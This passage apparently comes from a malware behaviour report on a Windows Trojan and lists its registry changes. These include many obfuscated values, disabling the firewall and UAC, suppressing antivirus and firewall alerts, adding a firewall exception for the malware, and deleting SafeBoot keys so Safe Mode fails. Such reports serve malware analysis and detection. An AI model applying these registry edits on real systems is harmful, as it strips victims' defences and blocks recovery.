"m1_210" = "3246919505"
"m1_211" = "267335146"
"m2_509" = "2794691734"
"m2_508" = "1059390846"
"m2_501" = "1797262862"
"m2_500" = "61979692"
"m2_503" = "972879383"
"m2_502" = "3532549682"
"m2_505" = "148495649"
"m2_504" = "2708162953"
"m2_507" = "3619075220"
"m2_506" = "1883778963"
"m3_508" = "1042708069"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKCU\Software\Stvncyfrlda]
"m3_509" = "2811290000"
"m3_599" = "40227362"
"m1_634" = "3486355108"
"m1_538" = "2635294892"
"m1_635" = "2425979515"

"m1_636" = "3137636771"
"m1_637" = "2125334093"
"m1_630" = "1018182745"
"m1_631" = "940518810"
"m1_632" = "3162961604"
"m1_633" = "22606794"
"m3_502" = "3549238679"
"m3_258" = "1011818995"
"m3_259" = "2780418414"
"m3_503" = "956269826"
"m3_250" = "14400091"
"m3_251" = "1749308918"
"m3_252" = "3518416229"
"m3_253" = "958887056"
"m3_254" = "2660361231"
"m3_255" = "100898746"
"m3_256" = "1869350697"
"m3_257" = "3571365444"
"m4_114" = "254647946"
"m4_115" = "1989938679"
"m4_116" = "3725229412"
"m4_117" = "1165552849"
"m4_110" = "1903419606"
"m4_111" = "3638710339"
"m4_112" = "1079033776"
"m4_113" = "2814324509"
"m4_118" = "2900843582"
"m4_119" = "341167019"
"m4_74" = "3857462658"
"m4_75" = "1297786095"
"m4_76" = "3033076828"
"m4_77" = "473400265"
"m4_70" = "1211267022"
"m4_71" = "2946557755"
"m4_72" = "386881192"
"m4_73" = "2122171925"
"m4_78" = "2208690998"
"m4_79" = "3943981731"
"m3_418" = "3813836243"
"m3_419" = "1220752718"
"m3_416" = "309754633"
"m3_417" = "2078337700"
"m3_414" = "1167808623"
"m3_415" = "2902838170"
"m3_412" = "1958230341"
"m3_413" = "3693783280"
"m3_410" = "2816286395"
"m3_411" = "256870870"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Stvncyfrlda]
"m4_338" = "2412715498"
"m4_339" = "4148006231"
"m4_628" = "3135854436"
"m4_629" = "576177873"
"m4_334" = "4061487158"
"m4_335" = "1501810595"
"m4_336" = "3237101328"
"m4_337" = "677424765"
"m4_330" = "1415291522"
"m4_331" = "3150582255"
"m4_332" = "590905692"
"m4_333" = "2326196425"
"m2_291" = "2458433879"
"m2_290" = "723135046"
"m2_293" = "1634049847"
"m2_292" = "4193717619"
"m2_295" = "809660825"
"m2_294" = "3369331314"
"m2_297" = "4280245633"
"m2_296" = "2544944037"
"m2_299" = "3455860219"
"m2_298" = "1720559950"
"m4_240" = "4152915504"
"m4_241" = "1593238941"
"m4_242" = "3328529674"
"m4_243" = "768853111"
"m4_244" = "2504143844"
"m4_245" = "4239434577"
"m4_246" = "1679758014"
"m4_247" = "3415048747"
"m4_248" = "855372184"
"m4_249" = "2590662917"
"m2_343" = "2499238095"
"m2_342" = "763940510"
"m2_341" = "3323623702"
"m2_340" = "1588323938"
"m2_347" = "850466783"
"m2_346" = "3410134774"
"m2_345" = "1674854037"
"m2_344" = "4234521990"
"m2_349" = "26082517"
"m2_348" = "2585748047"
"m2_76" = "3033075308"
"m2_77" = "473407197"
"m2_74" = "3857460319"
"m2_75" = "1297791275"
"m2_72" = "386889296"
"m2_73" = "2122176586"
"m2_70" = "1211257349"
"m2_71" = "2946564003"
"m2_78" = "2208688458"
"m2_79" = "3943988025"
"m3_57" = "110470508"
"m3_56" = "2703963633"
"m3_55" = "968530498"
"m3_54" = "3494439639"
"m3_53" = "1759411128"
"m3_52" = "57526285"
"m3_51" = "2583910558"
"m3_50" = "848472419"
"m3_59" = "3614491702"
"m3_58" = "1845908635"
"m1_458" = "3133317052"
"m1_459" = "1208491964"
"m1_450" = "1361678881"
"m1_451" = "1526833880"
"m1_452" = "833524768"
"m1_453" = "3835836132"
"m1_454" = "3851259889"
"m1_455" = "2866618880"
"m1_456" = "3417690718"
"m1_457" = "3237286689"
"m3_225" = "3909911780"
"m3_224" = "2174883145"
"m1_283" = "4243454667"
"m1_282" = "1784829856"
"m3_221" = "1263885104"
"m3_220" = "3823414149"
"m1_287" = "891347586"
"m1_286" = "2389819315"
"m2_192" = "2463337646"
"m2_193" = "4198634025"
"m2_190" = "3287721954"
"m2_191" = "728041369"
"m2_196" = "814570720"
"m2_197" = "2549852496"
"m2_194" = "1638950371"
"m2_195" = "3374250535"
"m2_198" = "4285151358"
"m2_199" = "1725467531"
"m3_609" = "213153892"
"m3_608" = "2806761673"
"m3_632" = "1503690545"
"m3_573" = "2200702160"
"m1_119" = "4180686801"
"m1_118" = "1810627919"
"m1_115" = "667707718"
"m1_114" = "320218196"
"m1_117" = "3661701600"
"m1_116" = "3591112201"
"m1_111" = "115559167"
"m1_110" = "3447796255"
"m1_113" = "3476791107"
"m1_112" = "2031211741"
"m2_578" = "2270659906"
"m2_579" = "4005960282"
"m2_574" = "3919431900"
"m2_575" = "1359761722"
"m2_576" = "3095047996"
"m2_577" = "535379312"
"m2_570" = "1273234129"
"m2_571" = "3008535883"
"m2_572" = "448848378"
"m2_573" = "2184147725"
"m1_201" = "3482801339"
"m1_200" = "2612394746"
"m1_203" = "3258441780"
"m1_202" = "186904953"
"m1_205" = "3574338832"
"m1_204" = "3978937446"
"m1_207" = "123795998"
"m1_206" = "874949549"
"m1_209" = "1441688483"
"m1_208" = "1666636253"
"m3_633" = "3239243436"
"m2_400" = "2626554019"
"m2_401" = "66886345"
"m2_402" = "1802168782"
"m2_403" = "3537468670"
"m2_404" = "977783452"
"m2_405" = "2713083769"
"m2_406" = "153396217"
"m2_407" = "1888697407"
"m2_408" = "3623979778"
"m2_409" = "1064309300"
"m3_249" = "2607352620"
"m3_248" = "871930801"
"m3_243" = "751873630"
"m3_242" = "3345366819"
"m3_241" = "1609928628"
"m3_240" = "4136311833"
"m3_247" = "3398363138"
"m3_246" = "1696364695"
"m3_245" = "4256418168"
"m3_244" = "2487310797"
"m1_577" = "2193656748"
"m4_107" = "992514703"
"m4_106" = "3552191266"
"m4_105" = "1816900533"
"m4_104" = "81609800"
"m4_103" = "2641286363"
"m4_102" = "905995630"
"m4_101" = "3465672193"
"m4_100" = "1730381460"
"m4_109" = "168128873"
"m4_108" = "2727805436"
"m4_41" = "2427443317"
"m4_40" = "692152584"
"m4_43" = "1603057487"
"m4_42" = "4162734050"
"m4_45" = "778671657"
"m4_44" = "3338348220"
"m4_47" = "4249253123"
"m4_46" = "2513962390"
"m4_49" = "3424867293"
"m4_48" = "1689576560"
"m3_444" = "1653222181"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Stvncyfrlda]
"m4_631" = "4046759339"
"m4_630" = "2311468606"
"m4_633" = "3222373509"
"m4_632" = "1487082776"
"m4_635" = "2397987679"
"m4_634" = "662696946"
"m4_637" = "1573601849"
"m4_636" = "4133278412"
"m4_639" = "749216019"
"m4_638" = "3308892582"
"m2_240" = "4152911792"
"m2_88" = "2381733106"
"m4_329" = "3974968085"
"m4_328" = "2239677352"
"m4_327" = "504386619"
"m4_326" = "3064063182"
"m4_325" = "1328772449"
"m4_324" = "3888449012"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKCU\Software\Stvncyfrlda]
"m4_322" = "417867546"
"m4_321" = "2977544109"
"m4_320" = "1242253376"
"m3_557" = "172694016"
"m3_568" = "2080658417"
"m4_450" = "3491749274"
"m3_642" = "1676674419"
"m3_555" = "1030290278"
"m1_476" = "225555419"
"m3_554" = "3590212555"
"m3_441" = "742299884"
"m2_81" = "3119602972"
"m3_552" = "119744801"
"m2_80" = "1384301449"
"m3_551" = "2679290290"
"m4_456" = "1018591784"
"m4_253" = "941891257"
"m4_252" = "3501567820"
"m4_251" = "1766277087"
"m4_250" = "30986354"
"m4_257" = "3588086893"
"m4_256" = "1852796160"
"m4_255" = "117505427"
"m4_254" = "2677181990"
"m4_259" = "2763701063"
"m4_258" = "1028410330"
"m1_605" = "3575383367"
"m2_376" = "3929258582"
"m2_377" = "1369572240"
"m2_374" = "458675037"
"m2_375" = "2193960198"
"m2_372" = "1283057456"
"m2_373" = "3018343341"
"m2_370" = "2107446614"
"m2_371" = "3842729037"
"m2_638" = "3308891404"
"m2_378" = "3104871443"
"m2_379" = "545186334"
"m3_443" = "4246322102"
"m3_44" = "3354938517"
"m3_45" = "795540480"
"m3_46" = "2497408959"
"m3_47" = "4232388394"
"m3_40" = "675414817"
"m3_41" = "2444014172"
"m3_42" = "4179439051"
"m3_43" = "1586486630"
"m3_48" = "1706528345"
"m3_49" = "3441441268"
"m2_632" = "1487080660"
"m1_449" = "4171068900"
"m1_448" = "1138312456"
"m1_443" = "4188646601"
"m1_442" = "1520599900"
"m1_441" = "3984958689"
"m1_440" = "1208492590"
"m1_447" = "1667272008"
"m1_446" = "2160477276"
"m1_445" = "2224877252"
"m1_444" = "833232183"
"m3_569" = "3849765740"
"m3_623" = "3032629354"
"m1_601" = "3904991114"

"m2_185" = "3201209192"
"m2_184" = "1465922450"
"m2_187" = "2376823211"
"m2_186" = "641527389"
"m2_181" = "555014882"
"m2_180" = "3114681450"
"m2_183" = "4025594545"
"m2_182" = "2290296618"
"m2_189" = "1552439344"
"m2_188" = "4112109298"
"m1_607" = "203879939"
"m1_600" = "2359956036"
"m3_563" = "1994155678"
"m3_482" = "3169755411"
"m3_484" = "2378809405"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKCU\Software\Stvncyfrlda]
"m4_626" = "3960240266"
"m3_457" = "2770830268"
"m4_627" = "1400563703"
"m2_569" = "3832920627"
"m2_568" = "2097618949"
"m2_567" = "362337589"
"m2_566" = "2922007399"
"m2_565" = "1186722713"
"m2_564" = "3746392208"
"m2_563" = "2011110715"
"m2_562" = "275811940"
"m2_561" = "2835495118"
"m2_560" = "1100196542"
"m4_624" = "489658800"
"m1_274" = "1210769380"
"m1_275" = "2098659134"
"m1_276" = "2829838510"
"m1_277" = "938317364"
"m1_270" = "2497538701"
"m1_271" = "1732347051"
"m1_272" = "902960287"
"m1_273" = "55513673"
"m1_278" = "1114295082"
"m1_279" = "1262554309"
"m1_308" = "3818216428"
"m4_235" = "4066396431"
"m4_625" = "2224949533"
"m4_234" = "2331105698"
"m1_300" = "3947191924"
"m1_301" = "849689875"
"m1_302" = "1338118699"
"m1_303" = "2483050397"
"m1_304" = "2093725780"
"m1_305" = "297731501"
"m1_306" = "3948505893"
"m1_307" = "3182479559"
"m2_413" = "3710507780"
"m2_412" = "1975206996"
"m2_411" = "239925955"
"m2_410" = "2799594930"
"m2_417" = "2061734157"
"m2_416" = "326437227"
"m2_415" = "2886119579"
"m2_414" = "1150821631"
"m2_419" = "1237351085"
"m2_418" = "3797021408"
"m3_278" = "1357802103"
"m3_279" = "3092776418"
"m3_276" = "2182302637"
"m3_277" = "3950901976"
"m3_274" = "3039832195"
"m3_275" = "446879806"
"m3_272" = "3830778361"
"m3_273" = "1304934676"
"m3_270" = "393932511"
"m3_271" = "2095357514"
"m1_61" = "1627026341"
"m2_515" = "321531983"
"m4_239" = "2417624771"
"m4_645" = "2571025825"
"m4_238" = "682334038"
"m4_138" = "3246919874"
"m4_139" = "687243311"
"m4_132" = "1425110068"
"m4_133" = "3160400801"
"m4_130" = "2249495898"
"m4_131" = "3984786631"
"m4_136" = "4071305704"
"m4_137" = "1511629141"
"m4_134" = "600724238"
"m4_135" = "2336014971"
"m3_474" = "2205754875"
"m3_475" = "3907769622"
"m3_476" = "1347699845"
"m3_477" = "3116823600"
"m3_470" = "3854825527"
"m3_471" = "1294756770"
"m3_472" = "2996706001"
"m3_473" = "436767308"
"m3_478" = "557279151"
"m3_479" = "2258704090"
"m4_58" = "1862614706"
"m4_59" = "3597905439"
"m4_56" = "2687000536"
"m4_57" = "127323973"
"m4_54" = "3511386366"
"m4_55" = "951709803"
"m4_52" = "40804900"
"m4_53" = "1776095633"
"m4_50" = "865190730"
"m4_51" = "2600481463"
"m3_452" = "2684343901"
"m3_184" = "1449360497"
"m3_185" = "3217944556"
"m3_186" = "658480923"
"m3_187" = "2359824054"
"m3_180" = "3097834125"
"m3_181" = "538419768"
"m3_182" = "2306891095"
"m3_183" = "4008889538"
"m3_188" = "4095393317"
"m3_189" = "1569401168"
"m1_39" = "2609756136"
"m1_38" = "2976799124"
"m4_312" = "244829400"
"m4_313" = "1980120133"
"m4_310" = "1069215230"
"m4_311" = "2804505963"
"m4_316" = "2891025036"
"m4_317" = "331348473"
"m4_314" = "3715410866"
"m4_315" = "1155734303"
"m4_622" = "1314044630"
"m4_318" = "2066639206"
"m4_319" = "3801929939"
"m3_453" = "124273096"
"m4_623" = "3049335363"
"m4_482" = "3186477882"
"m4_483" = "626801319"
"m4_480" = "4010863712"
"m4_481" = "1451187149"
"m4_486" = "1537706222"
"m4_487" = "3272996955"
"m4_484" = "2362092052"
"m4_485" = "4097382785"
"m3_500" = "45271757"
"m3_501" = "1780710008"
"m4_488" = "713320392"
"m4_489" = "2448611125"
"m3_504" = "2691183793"
"m3_505" = "165323820"
"m3_506" = "1900762971"
"m3_507" = "3602237174"
"m3_450" = "3508320179"
"m3_451" = "915220270"
"m4_266" = "2025834306"
"m4_267" = "3761125039"
"m4_264" = "2850220136"
"m4_265" = "290543573"
"m4_262" = "3674605966"
"m4_263" = "1114929403"
"m4_260" = "204024500"
"m4_261" = "1939315233"
"m4_268" = "1201448476"
"m4_269" = "2936739209"
"m2_369" = "372148218"
"m2_368" = "2931833564"
"m3_456" = "1035276289"
"m2_361" = "3669701569"
"m2_360" = "1934405142"
"m2_363" = "2845303912"
"m2_362" = "1110018260"
"m2_365" = "2020917661"
"m2_364" = "285637201"
"m2_367" = "1196531800"
"m2_366" = "3756218818"
"m2_10" = "173035032"
"m2_11" = "1908332309"
"m2_12" = "3643615059"
"m2_13" = "1083947171"
"m2_14" = "2819228657"
"m2_15" = "259562542"
"m2_16" = "1994846042"
"m2_17" = "3730142537"
"m2_18" = "1170459854"
"m2_19" = "2905759448"
"m3_71" = "2929954066"
"m3_70" = "1227955687"
"m3_73" = "2139008060"
"m3_72" = "369900673"
"m3_75" = "1280954054"
"m3_74" = "3840892843"
"m3_77" = "490007008"
"m3_76" = "3049946741"
"m3_79" = "3927378058"
"m3_78" = "2191956255"

"m1_478" = "3509216701"
"m1_479" = "1917390907"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

[HKCU\Software\Stvncyfrlda]
"m1_477" = "3871147985"
"m1_474" = "3855502793"
"m1_475" = "1245554344"
"m1_472" = "3973280739"
"m1_473" = "1962184746"
"m1_470" = "146288749"
"m1_471" = "1854399063"
"m3_454" = "1826287975"
"m3_553" = "1821235292"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Stvncyfrlda]
"m3_455" = "3561709714"
"m1_610" = "1163057877"
"m2_178" = "3939068130"
"m2_179" = "1379399389"
"m1_611" = "599832830"
"m2_170" = "2941640920"
"m2_171" = "381974444"
"m2_172" = "2117257690"
"m2_173" = "3852556196"
"m2_174" = "1292873222"
"m2_175" = "3028169473"
"m2_176" = "468487962"
"m2_177" = "2203785988"
"m3_488" = "730271201"
"m1_616" = "3327985631"
"m3_550" = "910167559"

[HKCU\Software\Stvncyfrlda\168128873]
"86519073" = "67"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI Class]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVC]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetMan]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\nm.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\nm]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Control\SafeBoot]
"AlternateShell"

The process a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 09 DF D0 83 3F 87 AD 9E B9 C8 23 ED B1 07 36"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The process Sense-codedownloader.exe:3400 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
